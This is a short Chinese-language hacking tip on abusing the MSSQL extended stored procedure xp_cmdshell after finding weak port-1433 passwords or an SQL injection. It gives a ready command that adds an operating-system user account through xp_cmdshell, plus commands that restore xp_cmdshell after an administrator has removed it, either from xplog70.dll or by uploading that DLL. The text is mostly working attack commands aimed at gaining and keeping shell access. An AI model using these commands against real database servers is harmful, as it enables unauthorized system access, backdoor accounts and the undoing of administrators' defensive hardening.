XP_CMDShell是MSSQl的扩展存储过程,调用此存储过程可以直接使用操作系统的shell所以这个扩展存储过程在扫描到1433弱口令或注入时经常用来执行系统命令
格式为: exec master ..xp_cmdshell'net user 用户名 密码 /add'
当管理员删除XP_CMDShell时=============================
输入Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回1的话就说明回复成功
否则
就要上传一个xplog70.dll文件在进行恢复了。
|
